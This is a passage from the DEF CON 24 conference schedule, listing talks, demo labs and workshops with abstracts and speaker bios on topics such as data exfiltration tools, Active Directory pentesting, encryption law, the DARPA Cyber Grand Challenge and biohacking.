Six_Volts is a "research mercenary" and has worked on High Performance Computing, embedded systems, vehicle networking and forensics, electronics prototyping and design, among other things. He's crashed cars for science, done digital forensics on a tangled mess of wires that used to be a semi truck, built HPC clusters out of old (and new) hardware, designed tools to extract data from vehicle EDRs, and in his spare time trains teams of students to defend enterprise networks.
Twitter: @Six_Volts
Haystack was a computer science student researching process control security, when one day he was recruited by a nefarious mechanical engineering professor hell-bent on dominating the field of accident reconstruction. After a series of dangerous training missions to various accident sites and junkyards, Haystack can now cut electronic control modules from wrecked trucks with surgical precision and extract crash data from them that was previously thought to be unrecoverable.
Return to Index
Demolabs - Table 1 - Saturday - 14:00-15:50
Cloakify Exfiltration Toolset
TryCatchHCF
The Cloakify Toolset is a data exfiltration tool that uses text-based steganography to hide data in plain sight, evade DLP/MLS devices, perform social engineering of SecOps analysts, and evade AV detection. Very simple tools, powerful concept, proven in real-world ops. Too many secure enclaves rely solely on the combination of AV + Automated Data Inspection + Analyst Review to prevent data exfiltration. This toolset easily defeats them all.
TryCatchHCF is the Principal InfoSec Engineer & Lead Pentester at LifeLock. He has 25+ years of security- and software-engineering experience, mostly in US gov't/DoD sectors, and served as an Intelligence Analyst and Counterintelligence Specialist in the United States Marine Corps. He hacked into his first systems in 1981 and wrote his first malware the following year, all while nearly being eaten by a grue. More recently he took 1st place in the 2013 Lockheed Martin Cyber Challenge. Education includes a bachelor's degree in Cognitive Science, a master's degree in Information Assurance, and the collective hivemind of the global hacking community.
Return to Index
CPV - Bronze 1 - Saturday - 12:00-13:00
Talk Title:
Code breaking - Catching a cheat
Speaker Name, Employer or position:
Nezer Zaidenberg (scipio) - Computer Science faculty member at College of Management, Israel - Docent & Researcher at University of Jyväskylä, Finland
Abstract:
We describe the great contract bridge scandal of 2015, in which the world's top pairs were found to cheat by illegal information transfer.
We describe the inaccurate accusation against one of the pairs (Mr. Lotan Fisher and Mr. Ron Schwartz).
We describe our statistical efforts to prove lack of sufficient evidence for conviction beyond reasonable doubt.
We describe our discovery of the real code in which information is transferred and means to discover it.
Bio:
Nezer is a researcher in the IT faculty of the University of Jyväskylä, Finland and a computer science faculty member at the College of Management, Israel.
Social media links if provided:
http://www.scipio.org/
Return to Index
DEFCON - Track One - Friday - 11:00-11:59
Compelled Decryption - State of the Art in Doctrinal Perversions
Ladar Levison Founder, Lavabit, LLC.
Get mirandized for an encrypted world. This talk will cover the legal doctrines and statutes our government is perverting to compel individuals into decrypting their data, or conscript technology companies into subverting the security of their own products. We’ll survey the arguments being advanced by prosecutors, the resulting case law, and the ethical dilemmas facing technology companies. The session will cover the rights and civil liberties we’ve already lost, and review the current threats to our collective freedoms. We’ll cover what an individual needs to know if they want to avoid compelled decryption and keep their data private. We’ll also discuss strategies that third parties (friends, f/oss developers, and technology companies) can use to resist conscription and build trust through transparency. Because knowing your rights is only half the battle.
Ladar Levison serves as the founder, president, and chief executive of Lavabit, where he has worked for the past 12 years. Founded in 2004 (and originally called Nerdshack), Lavabit was created because Mr. Levison believes that privacy is a fundamental, necessary right for a functioning, free and fair democratic society. Presently, Mr. Levison is focused on Lavabit's Dark Mail Initiative, which aims to make end-to-end email encryption automatic and ubiquitous, while continuing to vigorously advocate for the privacy and free speech rights of all. Mr. Levison's involvement in the internet can be traced to the early days of the world wide web, when he built his first website, in the early nineties, for the fledgling Mosaic web browser (from the National Center for Supercomputing Applications).
Prior, Mr. Levison operated a dialup bulletin board service, and worked as a computer technician assembling custom computer systems. With more than 10 years of experience as an independent consultant, Mr. Levison has brought to bear his skills as a project manager, business analyst, systems engineer, software developer, database administrator, systems administrator, and information security specialist.
Mr. Levison’s career has involved working with several dozen multinational companies in the financial, consumer electronics, and retail sectors. The websites Mr. Levison built have drawn millions of visitors, and the software he's written has touched, albeit behind the scenes, the lives of millions more. Over the years, Mr. Levison has written and published numerous technical specifications and authored several editorial pieces. Mr. Levison frequently speaks at a variety of conferences, has appeared as an expert on numerous network television shows, and appeared in several documentaries; including the Oscar winning film, /Citizenfour/.
Mr. Levison has also been involved with several popular free open source software projects. Mr. Levison holds fifteen certifications, with the vast majority from Microsoft and International Business Machines. Mr. Levison received his Bachelor of Arts and Bachelor of Science degrees from Southern Methodist University, where he studied finance, English, political science and computer science. Additionally, Mr. Levison spent a year studying international relations at Georgetown University. A native of San Francisco, California, he currently resides in Dallas, Texas where he lives with his best friend, and principal cheerleader, Princess, the Italian Greyhound he rescued in 2010.
Twitter: @kingladar
Facebook
Darkmail
Lavabit
Return to Index
BHV - Skyview 4 - Friday - 15:00-15:59
Speakers: Mr. Br!ml3y
About Mr. Br!ml3y:
Mr_Br!ml3y is a DefCon Biohacking Village regular who is currently working on a PhD at a research university in the Midwest. He also works in public sector network security to keep the lights on. His current research focuses on developing 3D computer models for contaminant transport in groundwater, with special emphasis on ionic contaminants (alkali metals and earths, halides). He has been exploring computational chemistry and nanochemistry to help with model development, and bioinformatics as a side interest.
Abstract:
Determining the effectiveness and fit of chemical compounds for human medical and health use is a time-consuming and expensive process. One method for reducing time and expense is the use of computational chemistry to model compound-receptor binding, which helps rule out unpromising or suboptimal compounds. This presentation explores the fundamentals of computational chemistry for various applications and the open-source programs available for use. Ab initio molecular modeling, molecular docking, and bioinformatics programs are discussed.
Return to Index
WOS - Skyview 6 - Friday - 15:10-15:59
Connections: Eisenhower and the Internet
Damon "Chef" Small, Technical Project Manager at NCC Group
"Rise of the Machines" conjures thoughts of the evolution of technology from the exclusive domain of computer scientists in the early days of our industry to everyday people using - and often wearing - Internet-connected devices. With that theme in mind, the speaker researches the history of one large, government-funded infrastructure and compares it to another: specifically, the Eisenhower Interstate System and the Internet. "Connections: Eisenhower and the Internet" explores what the logistical challenges of moving vehicles across the country can teach us about cybersecurity. Although these two topics seem unrelated, the speaker will take the audience on a journey that begins with early 20th century road-building projects, travels through ARPANET and the commercialization of the Internet, and arrives at current-day cyberspace. These two massive infrastructures have changed the world, and there are important lessons that the former can teach about the latter. The presentation concludes with predictions about the future of the Information Superhighway and how information security professionals can prepare.
Chef (Twitter: @damonsmall) earned his handle from his use of cooking metaphors to describe infosec concepts to laypeople. He began his career studying music at Louisiana State University and took advantage of computer skills learned in the LSU recording studio to become a systems administrator in the mid 1990s. Following the dotcom bust in the early 2000s, Chef began focusing on cyber security. This has remained his passion, and over the past 16 years as a security professional he has supported infosec initiatives in the healthcare, defense, and oil and gas industries. In addition to his Bachelor of Arts in Music, Chef completed the Master of Science in Information Assurance degree from Norwich University in 2005. His role as Technical Project Manager at NCC Group includes working closely with consultants and clients in delivering complex security assessments that meet varied business requirements. Recent speaking engagements include DEFCON 23, BSides Austin, BSides San Antonio, HouSecCon, and ISSA Houston.
Return to Index
Demolabs - Table 4 - Saturday - 14:00-15:50
CrackMapExec
Marcello Salvati
CrackMapExec is your one-stop-shop for pentesting Windows/Active Directory environments!
Written in Python and fully concurrent, it allows you to enumerate logged-on users, spider SMB shares, execute psexec-style attacks, auto-inject Mimikatz/shellcode/DLLs into memory using PowerShell, dump the NTDS.dit and much, much more!
Equipment Requirements (Network Needs, Displays, etc):
Internet connection is preferred but not necessary. 1 Display to clone laptop screen.
Marcello Salvati is a full-time pentester/security consultant at Coalfire Labs who has a passion for creating tools and eating sushi in his free time. He is an active contributor to multiple open-source projects/tools such as Responder, Impacket, Kali NetHunter and the Veil Framework, and has also created and actively maintains multiple open-source projects.
Return to Index
WOS - Skyview 6 - Friday - 18:10-18:59
Crawling for APIs
Ryan Mitchell, Senior Software Engineer at HedgeServ
As client machines become more powerful and JavaScript becomes more ubiquitous, servers are increasingly serving up code for browsers to execute, rather than the display-ready pages of the past. This changes the face of web scraping dramatically, as simply wget'ing and parsing the response from a URL becomes useless without executing bulky JavaScript with third-party plugins, reading through code logic manually, and/or digging through piles of browser junk.
However, moving page logic client side can also create data vulnerabilities, as companies leave internal APIs exposed to the world so that their client-side code can make use of them. I'll show some examples of this practice on traditionally "impossible to scrape" pages, and also some tools I've developed to crawl domains and discover and document these hidden APIs in an automated way. While many bot prevention measures focus on traditional page scraping and site manipulation, scripts that crawl sites through API calls, rather than in a "human-like" way through URLs, may present unique security challenges that modern web development practices do not sufficiently address.
Ryan Mitchell (Twitter: @kludgist)
Return to Index
BHV - Skyview 4 - Friday - 17:00-17:59
Speakers: David Bach
About David:
David Bach, MD
Founder and President, Platypus Institute
A Harvard-trained scientist, physician, and serial entrepreneur, Dr. Bach is the Founder and President of the Platypus Institute, an applied neuroscience research organization whose mission is to translate cutting-edge neuroscience discoveries into practical tools and programs that radically enhance the human experience. As an entrepreneur, Dr. Bach founded and built three healthcare technology companies, each of which became a $100M enterprise. He has also been a management consultant, a venture capitalist, a competitive martial artist and a professional cellist. He is also an avid biohacker.
Abstract:
During the past decade, a confluence of scientific breakthroughs in neuroimaging, biotechnology, cybernetics, sensor technology and data analytics have created a new tool in the self-improvement arsenal. Today, for the first time in history, we can “rewire” the human brain in highly targeted ways that dramatically enhance cognition, perception, creative ability, learning speeds and health. During this session, building largely on work from DARPA, we will explore emerging technologies you can use today to dramatically enhance your brain and your cognitive abilities. We will also take a look into the future of neurotech – and how it is going to fundamentally disrupt what it means to be human.
Return to Index
BHV - Skyview 4 - Sunday - 10:30-10:59
Speaker: Dr. Thomas P. Keenan
@drfuture
www.technocreep.com
About Dr. Thomas P. Keenan:
Dr. Thomas P. Keenan worked as a Systems Programmer on some of the earliest mainframe and timesharing systems, and cracked his first computer mischief case, “The Missionary Unmasker”, in 1973. He was educated at Columbia University, receiving BA, M.Sc., MA and Ed.D. degrees in Philosophy, Mathematics, Engineering and Education and is a popular professor of Environmental Design and Computer Science at the University of Calgary. As a busy and adventurous tech journalist, he scrubbed in on an organ transplant operation in Belgium, held Anthrax spores at Canadian Forces Base Suffield, and defused an IED in Afghanistan.
Tom taught Canada’s first computer crime course, in 1974, and was involved in drafting that country’s inaugural computer crime legislation. He has been an expert witness in civil and criminal cases involving technology, computer fraud, and claimed online defamation. He is the author of over 500 academic papers, book chapters, presentations and articles, and has spoken on five continents and won major honors and prizes including the $10,000 NSERC Award for Science Promotion. His 2014 book, Technocreep, dissects how technology is becoming creepy in hidden ways that are difficult for most people to understand. It has recently appeared in the top ten on Amazon.ca in categories including Civil Rights and Liberties, Technology & Society, and Social Aspects of Technology.
Abstract:
The announcement in 2012 that a natural phenomenon called CRISPR/Cas9 could be used as a kind of “precision gene editor” has a lot of people thinking. Exactly what does "gene editing" involve? What can be done right now in big labs? What about in your basement? Harvard Medical School professor George Church argued that “garage biologists” should be required to have a license to practice synthetic biology, but right now it’s a kind of Wild West out there. Sound familiar? We survived all those 1980s Commodore 64 computer hacking pranks and learned a lot from them. Then again, they didn’t involve E. coli and the possibility of mass annihilation. This presentation sorts out the biofacts from the biofiction, and suggests how DIY biology fans can use CRISPR/Cas9 to help make things better for themselves and the world.
Return to Index
CPV - Bronze 2 - Sunday - 12:00-12:30
Talk Title:
Crypto for Criminals: The OPSEC Concerns in Using Cryptography
Speaker Name, Employer or position:
John Bambenek - Manager of Threat Systems at Fidelis Cybersecurity
Abstract:
It's a given that the use of cryptography is a good thing to protect the confidentiality and privacy of one's online activities. However, there are a variety of pieces of information and metadata that can still be useful to attribute the individual using the crypto. This talk will cover OPSEC concerns with using crypto (and when not to use it). Additionally, a tool for random generation of self-signed certs will be discussed.
Bio:
John Bambenek is Manager of Threat Systems at Fidelis Cybersecurity and an incident handler with the Internet Storm Center. He has been engaged in security for 15 years, researching security threats. He is a published author of several articles, book chapters and one book. He has contributed to IT security courses and certification exams covering such subjects as penetration testing, reverse engineering malware, forensics, and network security. He has participated in many incident investigations spanning the globe. He speaks at conferences around the world and runs several private intelligence groups focusing on takedowns and disruption of criminal entities.
Social media links if provided:
@bambenek
Return to Index
DEFCON - Track Three - Saturday - 17:00-17:59
Crypto: State of the Law
Nate Cardozo, Senior Staff Attorney, Electronic Frontier Foundation
Strong end-to-end encryption is legal in the United States today, thanks to our victory in what's come to be known as the Crypto Wars of the 1990s. But in the wake of Paris and San Bernardino, there is increasing pressure from law enforcement and policy makers, both here and abroad, to mandate so-called backdoors in encryption products. In this presentation, I will discuss in brief the history of the first Crypto Wars and the state of the law coming into 2016. I will then discuss what happened in the fight between Apple and the FBI in San Bernardino and the current proposals to weaken or ban encryption, covering proposed and recently enacted laws in New York, California, Australia, India, and the UK. Finally, I will discuss possible realistic outcomes of the Second Crypto Wars, and give my predictions on what the State of the Law will be at the end of 2016.
Nate Cardozo is a Senior Staff Attorney on the Electronic Frontier Foundation’s digital civil liberties team. In addition to his focus on free speech and privacy litigation, Nate works on EFF’s cryptography policy and the Coders’ Rights Project. Nate has projects involving export controls on software, state-sponsored malware, automotive privacy, government transparency, hardware hacking rights, anonymous speech, electronic privacy law reform, Freedom of Information Act litigation, and resisting the expansion of the surveillance state. A 2009-2010 EFF Open Government Legal Fellow, Nate has a B.A. in Anthropology and Politics from U.C. Santa Cruz and a J.D. from U.C. Hastings.
Twitter: @ncardozo
Return to Index
Demolabs - Table 2 - Saturday - 10:00-11:50
CuckooDroid 2.0
Idan Revivo
To combat the growing problem of Android malware, we present a new solution based on the popular open source framework Cuckoo Sandbox to automate the malware investigation process. Our extension enables the use of Cuckoo's features to analyze Android malware and provides new functionality for dynamic and static analysis. Our framework is an all-in-one solution for malware analysis on Android. It is extensible and modular, allowing the use of new, as well as existing, tools for custom analysis.
Idan Revivo is a Mobile Security Technology/Team Leader at IBM-Trusteer focusing on mobile malware, and was previously a mobile malware researcher on Checkpoint's malware research team. He has presented at numerous security conferences. He specializes in Android internals and sandboxing techniques, including automated static and dynamic malware analysis. He has a diverse security background, which includes vulnerability analysis and electronic warfare, providing him with a broad and unique perspective on the cyber arena. Idan holds a bachelor's degree in Software Engineering, specializing in Mobile Systems.
Return to Index
DEFCON - Track Three - Saturday - 13:00-13:59
Cunning with CNG: Soliciting Secrets from Schannel
Jake Kambic, Hacker
Secure Channel (Schannel) is Microsoft's standard SSL/TLS library underpinning services like RDP, Outlook, Internet Explorer, Windows Update, SQL Server, LDAPS, Skype and many third-party applications. Schannel has been the subject of scrutiny in the past several years from an external perspective due to reported vulnerabilities, including an RCE.
What about the internals? How does Schannel guard its secrets? This talk looks at how Schannel leverages Microsoft's CryptoAPI-NG (CNG) to cache the master keys, session keys, private and ephemeral keys, and session tickets used in TLS/SSL connections. It discusses the underlying data structures, and how to extract both the keys and other useful information that provides forensic context about a connection. This information is then leveraged to decrypt sessions that use ephemeral cipher suites, which don't rely on the private key for decryption. Information in the cache lives for at least 10 hours by default on modern configurations, storing up to 20,000 entries each for client and server. This makes it forensically relevant in cases where other evidence of a connection may have dissipated.
Jake Kambic is a DFIR researcher and network penetration tester.
Twitter: @TinRabbit
Return to Index
Workshops - Las Vegas Ballroom 2 - Saturday - 10:00-14:00
Cyber Deception: Hunting advanced attacks with MazeRunner
Dean Sysman, CTO and co-founder @ Cymmetria
Detecting advanced threats is now widely assumed to be impossible or unlikely. One of the main waves in cyber security promising to enable that ability is cyber deception, a field that has garnered much attention and investment in the last couple of years. Based on the same concepts as honeypots, but on a different technology, cyber deception promises to create decoys and other assets that make attackers expose themselves, allowing its users not only to detect them but to collect forensics that can be used for immediate mitigation.
During this workshop, attendees will learn about MazeRunner, Cymmetria's cyber deception solution, which is being released for the first time as the first free general-use cyber deception tool. With it they will be able to set up deception across environments composed of decoys - real virtual machines that can be Linux or Windows systems - configure these machines with different network protocols and content so they look like anything needed to deceive a hacker, and lastly create the connections and credentials to these configurations to deploy to the endpoints, thereby creating a complete layer of deception to lead an attacker. Next we will show how to use the alerts and forensics gathered in order to enable automatic mitigation of threats and enrich your threat intel efforts.
Dean Sysman is CTO and co-founder of Cymmetria, an Israeli cyber deception start-up. A Unit 8200 veteran, Dean started his military intelligence career as a low-level security researcher, was later promoted to the rank of Captain to lead high-level security research, and earned multiple awards for his service. At 15 he won first place in the prestigious Robotics Olympiad, and by the age of 19 he had earned his B.Sc. in computer sciences. Before joining Cymmetria, Dean was involved in the development of a cross-platform translation compiler for embedded processors.
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate: Laptop with these software requirements: web browser; Metasploit framework is optional.
Return to Index
DEFCON - Track Two - Sunday - 15:00-15:59
Cyber Grand Shellphish
Yan Shoshitaishvili, PhD Student, UC Santa Barbara
Antonio Bianchi, UC Santa Barbara
Kevin Borgolte, UC Santa Barbara
Jacopo Corbetta, UC Santa Barbara
Francesco Disperati, UC Santa Barbara
Andrew Dutcher, UC Santa Barbara
Giovanni Vigna, UC Santa Barbara
Aravind Machiry, UC Santa Barbara
Chris Salls, UC Santa Barbara
Nick Stephens, UC Santa Barbara
Fish Wang, UC Santa Barbara
John Grosen, UC Santa Barbara
Last year, DARPA ran the qualifying event for the Cyber Grand Challenge to usher in the era of automated hacking. Shellphish, a rag-tag team of disorganized hackers mostly from UC Santa Barbara, decided to join the competition about ten minutes before the signups closed.
Characteristically, we proceeded to put everything off until the last minute, and spent 3 sleepless weeks preparing our Cyber Reasoning System for the contest. Our efforts paid off and, as we talked about last DEF CON, against all expectations, we qualified and became one of the 7 finalist teams. The finals of the CGC will be held the day before DEF CON.
If we win, this talk will be about how we won, or, in the overwhelmingly likely scenario of something going horribly wrong, this talk will be about butterflies.
In all seriousness, we've spent the last year working hard on building a really kickass Cyber Reasoning System, and there are tons of interesting aspects of it that we will talk about. Much of the process of building the CRS involved inventing new approaches to automated program analysis, exploitation, and patching. We'll talk about those, and try to convey how hackers new to the field can make their own innovations.
Other aspects of the CRS involved extreme amounts of engineering effort to make sure that the system optimally used its computing power and was properly fault-tolerant. We'll talk about how automated hacking systems should be built to best handle this. Critically, our CRS needed to be able to adapt to the strategies of the systems fielded by the other competitors. We'll talk about the AI that we built to strategize throughout the game and decide what actions should be taken.
At the end of this talk, you will know how to go about building your own autonomous hacking system! Or you might know a lot about butterflies.
Shellphish is a mysterious hacking collective famous for being great partiers and questionable hackers. The secret identities of the Shellphish CGC team are those of researchers in the security lab of UC Santa Barbara. When they're not CTFing or surfing, they're doing hard-hitting security research. Their works have been published in numerous academic venues and featured in many conferences. In 2015, they unleashed angr, the next (current?) generation of binary analysis, and have been working hard on it ever since!
Return to Index
BHV - Skyview 4 - Saturday - 14:00-14:59
Speaker: Awesome Folks from Various BioHacking Podcasts
Moderators: c00p3r and cur50r from Dangerous Minds Podcast; McStuff from 2 Cyborgs and a Microphone; Sciaticnerd from Security Endeavours.
Abstract:
For this panel, two of the hosts of "Dangerous Minds Podcast" will be joined by one of the hosts of "Two Cyborgs and a Microphone" and Sciaticnerd from "Security Endeavours" to record a normal episode with a mystery guest and/or guests to celebrate the 100th episode of DMP, and our first live recording. Join us for the learning, stay for the laughs, without editing out our goofs, and turn the tables on everyone and ask your own questions as well, so we can all learn together. It's going to be a little bit fun, a little bit of learning, and a lot of laughs as always. Come out and join us, and bring your own spark! And perhaps go away with more.
Return to Index
DEFCON - Track Two - Friday - 10:00-10:59
DARPA Cyber Grand Challenge Award Ceremony
Mike Walker, DARPA Program Manager
Dr. Arati Prabhakar, DARPA Director
On Friday morning, August 5th, DARPA will announce the prize winners and recognize the parties responsible for building and competing in the Cyber Grand Challenge (CGC), the world's first all-machine hacking tournament, which was completed August 4th. Seven high performance computers will have completed an all-machine Capture the Flag contest, reverse engineering unknown binary software, authoring new IDS signatures, probing the security of opponent software, and re-mixing defended services with machine-generated patches and defenses. Come hear about what transpired at CGC, and learn which team will be taking home the $2M grand prize, as well as the $1M second place and $750K third place prizes.
Mike Walker is the DARPA program manager for the Cyber Grand Challenge. His research interests include machine reasoning about software in situ and the automation of application security lifecycles. Prior to joining DARPA, Mr. Walker worked in industry as a security software developer, Red Team analyst, enterprise security architect and research lab leader. As part of the Computer Science Corporation ‘Strikeforce’ Red Team, Mr. Walker helped develop the HEAT Vulnerability Scanner and performed Red Team engagements. Serving as a principal at the Intrepidus Group, Mr. Walker worked on Red Teams that tested America's financial and energy infrastructure for security weaknesses. Also, on the DARPA SAFER Red Team, Mr. Walker discovered flaws in prototype communications technologies. Mr. Walker has participated in various roles in numerous applied computer security competitions. He contributed challenges to DEF CON Capture the Flag (CTF) and competed on and led CTF teams at the highest levels of international competition. Mr. Walker was formerly a mentor of the Computer Security Competition Club at Thomas Jefferson High School for Science and Technology (TJHSST).
Arati Prabhakar, Ph.D., is director of the Defense Advanced Research Projects Agency (DARPA). Serving in this position since July 2012, she has focused the agency's efforts on rethinking complex military systems in fundamental ways; harnessing the information explosion to address national security challenges; and planting new seeds of technological surprise in fields as diverse as mathematics, synthetic biology, and neurotechnology.
Dr. Prabhakar has spent her career investing in world-class engineers and scientists to create new technologies and businesses. Her first service to national security started in 1986 when she joined DARPA as a program manager. She initiated and managed programs in advanced semiconductor technology and flexible manufacturing, as well as demonstration projects to insert new semiconductor technologies into military systems. As the founding director of DARPA's Microelectronics Technology Office, she led a team of program managers whose efforts spanned these areas, as well as optoelectronics, infrared imaging and nanoelectronics.
In 1993, President William Clinton appointed Dr. Prabhakar director of the National Institute of Standards and Technology, where she led the 3,000-person organization in its work with companies across multiple industries.
Dr. Prabhakar moved to Silicon Valley in 1997, first as chief technology officer and senior vice president at Raychem, and later vice president and then president of Interval Research. From 2001 to 2011, she was a partner with U.S. Venture Partners, an early-stage venture capital firm. Dr. Prabhakar identified and served as a director for startup companies with the promise of significant growth. She worked with entrepreneurs focused on energy and efficiency technologies, consumer electronics components, and semiconductor process and design technologies.
Dr. Prabhakar received her Doctor of Philosophy in applied physics and Master of Science in electrical engineering from the California Institute of Technology. She received her Bachelor of Science in electrical engineering from Texas Tech University. She began her career as a Congressional Fellow at the Office of Technology Assessment.
Dr. Prabhakar has served in recent years on the National Academies' Science Technology and Economic Policy Board, the College of Engineering Advisory Board at the University of California, Berkeley, and the red team of DARPA's Defense Sciences Research Council. In addition, she chaired the Efficiency and Renewables Advisory Committee for the U.S. Department of Energy. Dr. Prabhakar is a Fellow of the Institute of Electrical and Electronics Engineers, a Member of the National Academy of Engineering, a Texas Tech Distinguished Engineer, and a Caltech Distinguished Alumna.
Twitter: @DARPA, #DARPACGC
Demolabs - Table 2 - Saturday - 12:00-13:50
DataSploit
Shubham Mittal
- Performs automated OSINT on a domain, email, username or phone number and finds relevant information from different sources.
- Useful for pen-testers, cyber investigators, product companies, etc.
- Correlates and collates the results and shows them in a consolidated manner.
- Tries to find credentials, API keys, tokens, subdomains, domain history, legacy portals, etc. related to the target.
- Available as a single consolidated tool as well as standalone scripts.
- Available in both a web GUI and a console.
Shubham is an active information security researcher with 4 years of experience in offensive and defensive security, with interests in defensive security and OSINT. He has given training, conducted numerous workshops and delivered talks at local security chapters and multiple conferences, including Nullcon 2016, Blackhat Asia 2016, Null Delhi and Bangalore chapters, IETF, etc. In his free time, he loves to craft open source tools in Python, and if the weather is nice, he loves to ride his bike. Twitter handle: @upgoingst
WOS - Skyview 6 - Friday - 12:10-12:59
Deceive and Succeed: Measuring the Efficiency of a Deception Eco-System in Post-Breach Detection
Omer Zohar, Head of Research at TopSpin Security
Today's networks are undergoing all sorts of sinister attacks from numerous sources and for myriad reasons. Security at the perimeter is inadequate for thwarting today's highly intelligent attacks as hackers routinely breach the perimeter and gain entry. It isn't long before the network is compromised and critical information is stolen. We must now assume that, despite significant investments in prevention, breaches are going to happen. An additional approach is required. Security teams must go on the offensive, creating a web of non-stop, real-time detection operations using multiple vectors against an ever-changing landscape of cyber threats. Deception technology now plays a critical role. Used as a strategy for many centuries in actual warfare, the concept of deception is becoming a significant weapon in network-protection schemes. Deception technology doesn't rely on known attack patterns and monitoring. Instead, it employs very advanced luring techniques to entice attackers away from valuable company assets and into pre-set traps, thus revealing their presence. It is able to detect threats in real time without relying on any signatures, heuristics or complex behavioral patterns. But how effective is a deception strategy in detecting breaches? What method works best? How does it integrate with current security operations already in place?
In this talk we will present findings from the first-ever research study that measured the efficiency of proactive deception using mini-traps and decoys in real-life threat scenarios. We reconstructed a real enterprise environment complete with endpoints, servers, network traffic and data repositories, as well as security tools such as IDS, firewall, SIEM, etc. The deception layer was then integrated into the environment in two steps: (a) by placing decoys in the network and (b) by placing mini-traps on the assets which point to the decoys, set false credentials, trigger silent alarms and more. We then evaluated the effectiveness of the mini-traps and decoys against both automated, machine-based attacks and sophisticated human attacks. The first stage involved checking the behavior of a variety of malware families against the environment and measuring the deception layer's success in detecting their activity. For the second phase, we invited red-team professionals and white hat hackers to employ real techniques and advanced tools with the task of moving laterally in the environment and exfiltrating high-value data.
Omer Zohar has over a decade of experience as a developer and researcher in the data security market. As head of Research for TopSpin Security he is responsible for the research of malware and post-breach detection methods and for defining advanced detection schemes.
Demolabs - Table 6 - Saturday - 16:00-17:50
Deep look at back end systems of the future of credit card fraud
Weston Hecker
Taking a deeper look at the future of credit card fraud platforms, including a custom-built carder site for the sale of live skimmed data; designing a "Blockchain"-style delivery system for live credit card data to cash-out devices; building a banking and credit processor back end from scratch; the DMVPN network design of the carder site back end; building "Lacara"; and automating credit card cash-out runs and the devices behind the attack.
Weston Hecker: 11 years of pen-testing, security research and programming. Speaker at Defcon 22, 23 and 24 Las Vegas, HOPE 11, TakedownCON 2016, B-Sides Boston, Blackhat 2016, Enterprise Connect 2016, ISC2, SC Congress Toronto. Has worked on several open source tools, including the Skimbad Anti-CC-Fraud Platform, Opencodec, hacker tools such as "CompanyBAN" (an AD automated company-wide lockout tool), several SDR tools, reverse engineering of malware, telephone DDoS tools and Open-CV. Hardware includes ATM shimmers, anti-skimmers, gas pump (anti-)skimmers and OldyellerUSB.
DEFCON - DEF CON 101 - Thursday - 16:00-16:59
DEF CON 101 Panel
Mike Petruzzi (wiseacre)
Ryan Clark (LosT)
CrYpT
HighWiz
Jay
Nikita Kronenberg
DEF CON has changed for the better since the days at the Alexis Park. It has evolved from a few speaking tracks to an event that still offers the speakers, but also Villages, where you can get hands-on experience and Demo Labs where you can see tools in action. Of course, there is still the Entertainment and Contest Area, as well as Capture The Flag. There is so much more to DEF CON than there was in the past and it is our goal to help you get the best experience possible. In addition to introducing each of the different aspects and areas of DEF CON, we have a panel of speakers that will talk about how they came to be part of DEF CON and their personal experiences over the years. Oh yeah, there is the time honored "Name the Noob", lots of laughs and maybe even some prizes. Plus, stay for the after party. Seriously, there is an after party. How awesome is that?
Mike Petruzzi (wiseacre) started at DEF CON participating in the Capture the Flag contest. Determined to do better the next year, he participated again. This time the format was 36 hours straight. He realized he was missing out on everything else that was happening at DEF CON. From then on he made a point to participate in as much as he could. Of course, within the limits of social anxiety so, if it allowed participation as a wallflower, he was in! Now, he wants to make sure everyone else gets to know as much as possible about this year's conference. In his private life, Mike hacks managers and is happy anyone listens to him at all. Mike would like to thank Highwiz for everything.
Ryan "LosT" Clarke has been involved with DEF CON for 16 years. In addition to his role on the CFP board, LosT serves as DEF CON's official Cryptographer and Puzzle Master. He is best known for his early LosT @ CON Mystery Challenges designed to force creative thinking, which also introduced him to his amazing wife! Now he is responsible for designing the badges and lanyards for DEF CON, in addition to torturing a subculture of enthusiastic crypto fans with his ever-so-subtle clues and red herring rabbit holes in his yearly Badge challenge. LosT enjoys learning as much as he can about as much as he can. He can usually be found around CON in the 1o57 room, mostly encouraging and sometimes distracting a ragged band of sleep-deprived attendees who are racing to complete the challenge.
CrYpT first attended DEF CON at DC10 as CrAzE, where he made the common mistake of staying on the sidelines and not actively participating in all DEF CON had to offer. The experience was tough for him and he did not return for many years. He tried again at DC17, but this time he made the decision to start putting himself out there. After a marked improvement in the quality of his experience, he was determined to make each year better than the last. At DC20 he received the handle CrYpT from Y3t1 and met some people who would remain his closest friends to this day (looking at you Clutch). Now he leads the awesome, hard-working Inhuman Registration team in their quest to badge all the people. He's a member of the CFP Review Board and Security Tribe. In an effort to help welcome all the new faces at DEF CON, he is returning for his second year to the DC 101 panel. He encourages people to reach out and ask questions so they can get the most bang for their badge.
Born of glitter and moon beams, HighWiz is the things that dreams are made of and nightmares long to be... Years ago, with the help of some very awesome people* he set about to create an event that would give the n00bs of Def Con a place to feel welcomed and further their own pursuit of knowledge. For years he has held onto the simple tenet that "You get out of Def Con what you put into it". Sometimes HighWiz can be a bit much to swallow and hard to take. HighWiz is a member of the CFP Review Board and Security Tribe.
*Some (but not all) of the people HighWiz would like to thank for helping to make 101 into what it is today : Runnerup, Wiseacre, Nikita, Roamer, Lockheed, Pyr0, Zac, V3rtgio, 1o57, Neil, Beaker, AlxRogan, Jenn, Zant, GM1, Clutch, TheDarkTangent, Siviak, Ripshy, Valkyrie, Xodia, Flipper and all the members of Security Tribe. After taking a year off from the 101 Panel, HighWiz is honored to once again be participating in it, as it marks its eighth year.
Jay Korpi is not of the traditional hacker world; CrYpT invited him to DEF CON 6 years ago, and as a surgical first assist, he decided it was not of any interest to him. CrYpT insisted every year until finally three years ago CrYpT told him "there are people there smarter than you..." Jay couldn't believe it and had to see it for himself. His first year, it was obvious there were MANY people smarter than he was. Once he met some amazing people who were both inviting and generous, Jay vowed to get involved with DEF CON somehow so he could provide the same experience to others. He found his opportunity last year when he joined the Inhuman Registration team and was invited to share his experiences on the DC 101 panel. He attributes these opportunities to his willingness to put himself out there and meet as many people as possible from his very first CON.
Nikita Kronenberg
